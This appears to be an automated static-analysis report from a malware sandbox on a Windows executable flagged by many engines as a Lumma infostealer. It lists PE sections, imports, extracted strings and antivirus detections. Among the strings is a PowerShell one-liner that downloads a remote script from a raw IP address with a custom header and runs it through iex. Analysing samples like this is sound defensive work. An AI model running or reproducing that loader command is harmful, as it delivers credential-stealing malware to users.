Static | ZeroBOX

PE Compile Time

2024-11-07 03:29:43

PE Imphash

398697f041e256fb6c451f1966f76316

Sections

Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy
.text 0x00001000 0x00011250 0x00011400 6.48567420589
.rdata 0x00013000 0x00009b60 0x00009c00 4.7514314323
.data 0x0001d000 0x00001c60 0x00000c00 1.88495959495
.pdata 0x0001f000 0x00001134 0x00001200 4.76753970732
_RDATA 0x00021000 0x000001f4 0x00000200 3.60790093926
.rsrc 0x00022000 0x000001e0 0x00000200 4.70436301348
.reloc 0x00023000 0x0000065c 0x00000800 4.88519629284

Resources

Name | Offset | Size | Language | Sub-language | File type
RT_MANIFEST 0x00022060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x140013000 RtlCaptureContext
0x140013008 RtlLookupFunctionEntry
0x140013010 RtlVirtualUnwind
0x140013018 UnhandledExceptionFilter
0x140013028 GetCurrentProcess
0x140013030 TerminateProcess
0x140013040 QueryPerformanceCounter
0x140013048 GetCurrentProcessId
0x140013050 GetCurrentThreadId
0x140013058 GetSystemTimeAsFileTime
0x140013060 InitializeSListHead
0x140013068 IsDebuggerPresent
0x140013070 GetStartupInfoW
0x140013078 GetModuleHandleW
0x140013080 RtlUnwindEx
0x140013088 GetLastError
0x140013090 SetLastError
0x140013098 EnterCriticalSection
0x1400130a0 LeaveCriticalSection
0x1400130a8 DeleteCriticalSection
0x1400130b8 TlsAlloc
0x1400130c0 TlsGetValue
0x1400130c8 TlsSetValue
0x1400130d0 TlsFree
0x1400130d8 FreeLibrary
0x1400130e0 GetProcAddress
0x1400130e8 LoadLibraryExW
0x1400130f0 EncodePointer
0x1400130f8 RaiseException
0x140013100 RtlPcToFileHeader
0x140013108 GetStdHandle
0x140013110 WriteFile
0x140013118 GetModuleFileNameW
0x140013120 ExitProcess
0x140013128 GetModuleHandleExW
0x140013130 GetCommandLineA
0x140013138 GetCommandLineW
0x140013140 HeapFree
0x140013148 CloseHandle
0x140013150 WaitForSingleObject
0x140013158 GetExitCodeProcess
0x140013160 CreateProcessW
0x140013168 GetFileAttributesExW
0x140013170 HeapAlloc
0x140013178 FindClose
0x140013180 FindFirstFileExW
0x140013188 FindNextFileW
0x140013190 IsValidCodePage
0x140013198 GetACP
0x1400131a0 GetOEMCP
0x1400131a8 GetCPInfo
0x1400131b0 MultiByteToWideChar
0x1400131b8 WideCharToMultiByte
0x1400131c0 GetEnvironmentStringsW
0x1400131c8 FreeEnvironmentStringsW
0x1400131d0 SetEnvironmentVariableW
0x1400131d8 SetStdHandle
0x1400131e0 GetFileType
0x1400131e8 GetStringTypeW
0x1400131f0 FlsAlloc
0x1400131f8 FlsGetValue
0x140013200 FlsSetValue
0x140013208 FlsFree
0x140013210 CompareStringW
0x140013218 LCMapStringW
0x140013220 GetProcessHeap
0x140013228 HeapSize
0x140013230 HeapReAlloc
0x140013238 FlushFileBuffers
0x140013240 GetConsoleOutputCP
0x140013248 GetConsoleMode
0x140013250 SetFilePointerEx
0x140013258 CreateFileW
0x140013260 WriteConsoleW

Strings

!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
u/HcH<H
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
vyfffff
vyfffff
fffffff
fffffff
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
p0R^G'
u3HcH<H
WAVAWH
A_A^_
WAVAWH
A_A^_
D$0@8{
p*W4H
p*W4H
WATAUAVAWH
0A_A^A]A\_
x UAVAWH
t(LcuoH;
t$ WATAUAVAWH
A_A^A]A\_
@USVWATAUAVAWH
xA_A^A]A\_^[]
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
f9)u4H9j
u%@8j(t
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
UVWATAUAVAWH
xWI96tRI
0A_A^A]A\_^]
fD9t$b
@UATAUAVAWH
e0A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
p0R^G'
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
L$ VWAVH
fD94H}aD
UVWATAUAVAWH
L9#t!H
:u A8N
pA_A^A]A\_^]
t$ WATAUAVAWH
0A_A^A]A\_
UATAUAVAWH
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$ptGH
D8l$pt
D8l$pt
A_A^A]A\]
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
A_A^A]A\]
x UAVAWH
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
WATAUAVAWH
0A_A^A]A\_
@USVWATAUAVAWH
eHA_A^A]A\_^[]
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
USVWAVH
A^_^[]
LcA<E3
fffffff
ffffff
vKfffff
fffffff
fffffff
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
COMSPEC
cmd.exe
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
.text$mn
.text$mn$00
.text$mn$21
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
RaiseException
RtlPcToFileHeader
GetStdHandle
WriteFile
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
GetCommandLineA
GetCommandLineW
HeapFree
CloseHandle
WaitForSingleObject
GetExitCodeProcess
CreateProcessW
GetFileAttributesExW
HeapAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetFileType
GetStringTypeW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
CompareStringW
LCMapStringW
GetProcessHeap
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
CreateFileW
WriteConsoleW
KERNEL32.dll
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Antivirus | Signature
Bkav W64.AIDetectMalware
Lionic Clean
Elastic Clean
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
CrowdStrike win/malicious_confidence_60% (W)
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
Paloalto generic.ml
Symantec Clean
tehtris Clean
ESET-NOD32 a variant of Generik.DSFMISL
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.74707168
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.74707168
Tencent Clean
Sophos Mal/Generic-S
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro TrojanSpy.Win64.LUMMASTEALER.YXEKGZ
McAfeeD ti!A0AEB837CB5E
Trapmine Clean
CTX exe.trojan.generic
Emsisoft Trojan.GenericKD.74707168 (B)
Ikarus Trojan.SuspectCRC
FireEye Trojan.GenericKD.74707168
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet PossibleThreat.RF
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5691559
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Spyware.Lumma
Panda Clean
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win64.LUMMASTEALER.YXEKGZ
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
GData Win64.Trojan.Agent.497GYW
AVG Win64:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.